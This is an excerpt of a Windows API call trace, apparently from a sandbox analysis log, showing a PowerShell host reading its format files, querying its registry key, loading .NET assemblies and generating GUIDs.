	[0658.299] ReadFile (in: hFile=0x2f8, lpBuffer=0x32ff0c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x32ff0c0*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0658.300] ReadFile (in: hFile=0x2f8, lpBuffer=0x32ff0c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x32ff0c0*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0658.300] ReadFile (in: hFile=0x2f8, lpBuffer=0x32ff0c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x32ff0c0*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0658.301] ReadFile (in: hFile=0x2f8, lpBuffer=0x32ff0c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x32ff0c0*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0658.302] ReadFile (in: hFile=0x2f8, lpBuffer=0x32ff0c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x32ff0c0*, lpNumberOfBytesRead=0x12d3d8*=0xfb2, lpOverlapped=0x0) returned 1
	[0658.302] ReadFile (in: hFile=0x2f8, lpBuffer=0x32fe7da, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x32fe7da*, lpNumberOfBytesRead=0x12d3d8*=0x0, lpOverlapped=0x0) returned 1
	[0658.302] ReadFile (in: hFile=0x2f8, lpBuffer=0x32ff0c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x32ff0c0*, lpNumberOfBytesRead=0x12d3d8*=0x0, lpOverlapped=0x0) returned 1
	[0658.302] CloseHandle (hObject=0x2f8) returned 1
	[0658.303] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12d120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0658.303] SetErrorMode (uMode=0x1) returned 0x1
	[0658.303] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d380 | out: lpFileInformation=0x12d380*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0658.303] SetErrorMode (uMode=0x1) returned 0x1
	[0658.303] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0658.303] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d468 | out: phkResult=0x12d468*=0x2f8) returned 0x0
	[0658.304] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d3ec, lpData=0x0, lpcbData=0x12d3e8*=0x0 | out: lpType=0x12d3ec*=0x1, lpData=0x0, lpcbData=0x12d3e8*=0x56) returned 0x0
	[0658.304] CoTaskMemAlloc (cb=0x5a) returned 0x30b540
	[0658.304] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d3bc, lpData=0x30b540, lpcbData=0x12d3b8*=0x56 | out: lpType=0x12d3bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12d3b8*=0x56) returned 0x0
	[0658.304] CoTaskMemFree (pv=0x30b540) 
	[0658.304] RegCloseKey (hKey=0x2f8) returned 0x0
	[0658.304] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0658.304] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0658.308] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0xc039f6b7, Data2=0x680b, Data3=0x4357, Data4=([0]=0x95, [1]=0x20, [2]=0x90, [3]=0xb5, [4]=0x2e, [5]=0x9d, [6]=0x3a, [7]=0xce))) returned 0x0
	[0658.309] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0x18176480, Data2=0xa489, Data3=0x493a, Data4=([0]=0xb4, [1]=0x1b, [2]=0x9f, [3]=0x59, [4]=0xe4, [5]=0x3, [6]=0xb6, [7]=0x24))) returned 0x0
	[0658.309] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0x1da8491d, Data2=0x8f6b, Data3=0x4103, Data4=([0]=0x8d, [1]=0x1a, [2]=0xea, [3]=0x80, [4]=0x80, [5]=0x39, [6]=0x2a, [7]=0xec))) returned 0x0
	[0658.310] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0x93358019, Data2=0x1bf2, Data3=0x4fcd, Data4=([0]=0xa2, [1]=0x2f, [2]=0x4, [3]=0x35, [4]=0x8c, [5]=0x14, [6]=0x98, [7]=0x88))) returned 0x0
	[0658.310] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0x9dfa9f2f, Data2=0x32b5, Data3=0x45d1, Data4=([0]=0x9c, [1]=0xe2, [2]=0x8, [3]=0x4b, [4]=0xed, [5]=0xb3, [6]=0xd2, [7]=0x63))) returned 0x0
	[0658.310] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0xe3438840, Data2=0x30ff, Data3=0x4ad1, Data4=([0]=0x81, [1]=0xfe, [2]=0x6, [3]=0xdb, [4]=0x22, [5]=0xe2, [6]=0x43, [7]=0xf0))) returned 0x0
	[0658.311] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f8
	[0658.311] GetFileType (hFile=0x2f8) returned 0x1
	[0658.311] SetErrorMode (uMode=0x1) returned 0x1
	[0658.311] GetFileType (hFile=0x2f8) returned 0x1
	[0658.311] ReadFile (in: hFile=0x2f8, lpBuffer=0x334ae20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x334ae20*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0658.313] ReadFile (in: hFile=0x2f8, lpBuffer=0x334ae20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x334ae20*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0658.313] ReadFile (in: hFile=0x2f8, lpBuffer=0x334ae20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x334ae20*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0658.314] ReadFile (in: hFile=0x2f8, lpBuffer=0x334ae20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x334ae20*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0658.315] ReadFile (in: hFile=0x2f8, lpBuffer=0x334ae20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x334ae20*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0658.315] ReadFile (in: hFile=0x2f8, lpBuffer=0x334ae20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x334ae20*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0658.315] ReadFile (in: hFile=0x2f8, lpBuffer=0x334ae20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x334ae20*, lpNumberOfBytesRead=0x12d3d8*=0xaca, lpOverlapped=0x0) returned 1
	[0658.315] ReadFile (in: hFile=0x2f8, lpBuffer=0x334a452, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x334a452*, lpNumberOfBytesRead=0x12d3d8*=0x0, lpOverlapped=0x0) returned 1
	[0658.316] ReadFile (in: hFile=0x2f8, lpBuffer=0x334ae20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x334ae20*, lpNumberOfBytesRead=0x12d3d8*=0x0, lpOverlapped=0x0) returned 1
	[0658.316] CloseHandle (hObject=0x2f8) returned 1
	[0658.316] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12d120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0658.316] SetErrorMode (uMode=0x1) returned 0x1
	[0658.316] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d380 | out: lpFileInformation=0x12d380*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0658.316] SetErrorMode (uMode=0x1) returned 0x1
	[0658.316] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0658.317] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d468 | out: phkResult=0x12d468*=0x2f8) returned 0x0
	[0658.317] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d3ec, lpData=0x0, lpcbData=0x12d3e8*=0x0 | out: lpType=0x12d3ec*=0x1, lpData=0x0, lpcbData=0x12d3e8*=0x56) returned 0x0
	[0658.317] CoTaskMemAlloc (cb=0x5a) returned 0x30b540
	[0658.317] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d3bc, lpData=0x30b540, lpcbData=0x12d3b8*=0x56 | out: lpType=0x12d3bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12d3b8*=0x56) returned 0x0
	[0658.317] CoTaskMemFree (pv=0x30b540) 
	[0658.317] RegCloseKey (hKey=0x2f8) returned 0x0
	[0658.317] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0658.317] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0658.323] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x12c8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0658.325] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12c8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0658.337] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x12c8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0660.126] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0660.134] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x12c8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0660.136] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0x12c8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52
	[0660.138] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0x12c8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74
	[0660.140] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x12c8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0660.142] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", nBufferLength=0x105, lpBuffer=0x12c8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", lpFilePart=0x0) returned 0x60
	[0660.144] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x12c8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0660.146] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x12c8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0660.147] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x12c8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0660.150] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", nBufferLength=0x105, lpBuffer=0x12c8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", lpFilePart=0x0) returned 0x50
	[0661.543] VirtualQuery (in: lpAddress=0x12bf00, lpBuffer=0x12cdc0, dwLength=0x30 | out: lpBuffer=0x12cdc0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0661.544] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0x60e9fda8, Data2=0xdb96, Data3=0x4913, Data4=([0]=0xb2, [1]=0xbd, [2]=0xb3, [3]=0x7c, [4]=0x4, [5]=0xcc, [6]=0x53, [7]=0x69))) returned 0x0
	[0661.545] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0xe68752e4, Data2=0xf641, Data3=0x4eff, Data4=([0]=0x87, [1]=0x93, [2]=0x54, [3]=0xb2, [4]=0x43, [5]=0xb1, [6]=0x98, [7]=0xff))) returned 0x0
	[0661.546] VirtualQuery (in: lpAddress=0x12c0b0, lpBuffer=0x12cf70, dwLength=0x30 | out: lpBuffer=0x12cf70*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0661.547] VirtualQuery (in: lpAddress=0x12c0b0, lpBuffer=0x12cf70, dwLength=0x30 | out: lpBuffer=0x12cf70*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0661.549] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0x176fd8d1, Data2=0x24ea, Data3=0x4be2, Data4=([0]=0xbd, [1]=0xc5, [2]=0x6c, [3]=0x39, [4]=0x66, [5]=0xaf, [6]=0x72, [7]=0xbc))) returned 0x0
	[0661.552] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0xa78c4619, Data2=0x1ab6, Data3=0x4468, Data4=([0]=0x88, [1]=0x2e, [2]=0xda, [3]=0x81, [4]=0xa7, [5]=0xc2, [6]=0x3, [7]=0xca))) returned 0x0
	[0661.552] VirtualQuery (in: lpAddress=0x12c300, lpBuffer=0x12d1c0, dwLength=0x30 | out: lpBuffer=0x12d1c0*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0663.192] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0x6cff5961, Data2=0x645a, Data3=0x4adb, Data4=([0]=0xae, [1]=0xe5, [2]=0xa, [3]=0x48, [4]=0x22, [5]=0x55, [6]=0x1e, [7]=0x7))) returned 0x0
	[0663.193] VirtualQuery (in: lpAddress=0x12b970, lpBuffer=0x12c830, dwLength=0x30 | out: lpBuffer=0x12c830*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0663.193] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0xe53e7c58, Data2=0xf09b, Data3=0x4705, Data4=([0]=0x87, [1]=0x37, [2]=0xf6, [3]=0x3e, [4]=0x55, [5]=0xcf, [6]=0xc5, [7]=0x10))) returned 0x0
	[0663.193] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0x24d636ca, Data2=0xaf87, Data3=0x48b5, Data4=([0]=0x95, [1]=0xa, [2]=0xad, [3]=0xcf, [4]=0xaf, [5]=0xe5, [6]=0x48, [7]=0x78))) returned 0x0
	[0663.193] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x324
	[0663.193] GetFileType (hFile=0x324) returned 0x1
	[0663.193] SetErrorMode (uMode=0x1) returned 0x1
	[0663.193] GetFileType (hFile=0x324) returned 0x1
	[0663.194] ReadFile (in: hFile=0x324, lpBuffer=0x322d4b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x322d4b8*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0663.194] ReadFile (in: hFile=0x324, lpBuffer=0x322d4b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x322d4b8*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0663.195] ReadFile (in: hFile=0x324, lpBuffer=0x322d4b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x322d4b8*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0663.195] ReadFile (in: hFile=0x324, lpBuffer=0x322d4b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x322d4b8*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0663.195] ReadFile (in: hFile=0x324, lpBuffer=0x322d4b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x322d4b8*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0663.195] ReadFile (in: hFile=0x324, lpBuffer=0x322d4b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x322d4b8*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0663.195] ReadFile (in: hFile=0x324, lpBuffer=0x322d4b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x322d4b8*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0663.196] ReadFile (in: hFile=0x324, lpBuffer=0x322d4b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x322d4b8*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0663.197] ReadFile (in: hFile=0x324, lpBuffer=0x322d4b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x322d4b8*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0663.197] ReadFile (in: hFile=0x324, lpBuffer=0x322d4b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x322d4b8*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0663.197] ReadFile (in: hFile=0x324, lpBuffer=0x322d4b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x322d4b8*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0663.197] ReadFile (in: hFile=0x324, lpBuffer=0x322d4b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x322d4b8*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0663.197] ReadFile (in: hFile=0x324, lpBuffer=0x322d4b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x322d4b8*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0663.198] ReadFile (in: hFile=0x324, lpBuffer=0x322d4b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x322d4b8*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0663.198] ReadFile (in: hFile=0x324, lpBuffer=0x322d4b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x322d4b8*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0663.198] ReadFile (in: hFile=0x324, lpBuffer=0x322d4b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x322d4b8*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0663.200] ReadFile (in: hFile=0x324, lpBuffer=0x322d4b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d3d8, lpOverlapped=0x0 | out: lpBuffer=0x322d4b8*, lpNumberOfBytesRead=0x12d3d8*=0x1000, lpOverlapped=0x0) returned 1
